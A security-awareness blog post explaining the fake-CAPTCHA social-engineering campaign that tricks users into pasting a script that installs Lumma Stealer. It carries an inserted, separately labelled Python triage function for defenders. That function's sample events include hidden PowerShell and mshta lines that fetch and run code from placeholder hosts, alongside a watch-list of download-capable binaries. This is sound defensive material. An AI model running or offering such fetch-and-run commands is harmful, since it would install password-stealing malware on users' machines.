Don’t Fall Victim to 2025’s Newest Hacks
In the last year, we have seen AI super-charge cyberattacks by helping criminals find new attack vectors, polish their grammar, and craft the perfect “hook” to engineer your behavior. We are already seeing this trend continue into 2025. In this blog post we will explore a new social engineering technique that abuses your trust in CAPTCHAs.
You may have read the above and thought, “I don’t know what a CAPTCHA is, so there’s no way this could apply to me!” Unfortunately, that’s what makes this technique so insidious. CAPTCHAs are those small tests on the internet that take 10–20 seconds of your time to complete a mundane task, proving your humanity during account creation, sign-in, online purchases, event registration, and every other online task that developers around the world want to keep hackers from automating. If you’re reading this blog, then you undoubtedly have an internet connection and know how to use it! Hopefully, by now, we’ve put a name to the face of what a CAPTCHA is, and you’re starting to see how the “trust” I mentioned earlier plays into our behavior online.
Now that we have our definitions in check, let’s discuss the details of this hack!
When you need to enter a CAPTCHA online, you are usually asked to match patterns, re-enter text that has been stretched or distorted, move something with your mouse, align a picture, identify objects among similarly colored or shaped ones, and so forth. That’s already a pretty long list of different tasks we are all in the habit of doing online, whenever asked, without thinking. All of us have seen, and will continue to see, these online tests evolve year over year. In 2012, most of us probably could not have predicted the next type of task these tests would mandate, and now, 13 years later in 2025, it would still be impossible to do anything other than guess.
If you were on a website trying to do a task, and you were presented with a 15-second task asking you to press some keyboard shortcuts and then copy and paste some text, would you? That is exactly what this cyber threat is designed to make you do!
By purchasing prime advertising spots on real webpages and replacing the ads with fake CAPTCHA tasks, hackers have successfully stolen passwords from people of all ages across the world in a widespread hacking campaign. In the nitty-gritty details, the shortcuts they ask you to press open a discreet command prompt window you may not be used to seeing, and the text you paste in is a script that downloads malware known as “Lumma Stealer”. The name alone, “Lumma Stealer”, probably tells you everything you need to know: this is an application designed to steal your passwords and your data, like banking information. Unless you’re an IT or cybersecurity professional, the way the task is presented seems innocent and quick enough that most people will do it without giving it much thought.
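The paste-and-run step above leaves a recognizable trace for defenders: an interpreter launched from the desktop shell with a URL on its command line. The triage function below is an added example, not code from this post or from Netskope; it assumes Sysmon-style process-creation records with (parent image, child image, command line) fields, that explorer.exe is the parent of anything started from the Run dialog, and uses constructed sample events with placeholder `example.invalid` URLs.

```python
import ntpath
import re

# Interpreters and download-capable Windows binaries that a pasted one-liner
# would typically invoke (assumption: a defender's watch-list, not from the page).
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

# Constructed sample events: (parent image, child image, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell -w hidden -c "iwr http://example.invalid/verify | iex"'),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
     "mshta https://example.invalid/captcha.hta"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
     "notepad.exe notes.txt"),
    # A developer fetching a script from a terminal: parent is not the shell.
    (r"C:\Program Files\Git\git-bash.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell -c "iwr https://internal.example/script.ps1"'),
]


def reasons_for(parent, image, cmdline):
    """Return the list of indicators seen in one process-creation event."""
    reasons = []
    if ntpath.basename(parent).lower() == "explorer.exe":
        reasons.append("launched from explorer.exe (Run dialog / shell)")
    if ntpath.basename(image).lower() in INTERPRETERS:
        reasons.append("interpreter or download-capable binary")
    if URL_RE.search(cmdline):
        reasons.append("URL on command line")
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden window requested")
    return reasons


def is_suspicious(parent, image, cmdline):
    """Flag only the combination: shell-launched interpreter that reaches out to a URL."""
    r = reasons_for(parent, image, cmdline)
    return ("launched from explorer.exe (Run dialog / shell)" in r
            and "interpreter or download-capable binary" in r
            and "URL on command line" in r)


def triage(events):
    """Indices of events matching the paste-and-run pattern."""
    return [i for i, ev in enumerate(events) if is_suspicious(*ev)]
```

Feeding real Sysmon Event ID 1 records through `triage` gives a short list to review; the developer event is deliberately left unflagged to show the parent-process check doing its job.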
This is what makes human-centric security so very important.
We live in a world where it seems like everything wants to take either our money or the newest commodity on the block, our information. Abuse of our trust is rampant online, from complex disinformation campaigns like fake news to individuals just hoping to make our day a little more unpleasant. It’s on us to ensure we stay up to date and stay conscious of the latest cyber threats that may come our way.
Hopefully this encourages you to think about some of the things we have learned to trust in our always-online culture, and how that trust could be abused by anyone.
Credit to Netskope Threat Labs for providing technical details and information on the scope of this attack.
Lumma Stealer: Fake CAPTCHAs & New Techniques to Evade Detection – Netskope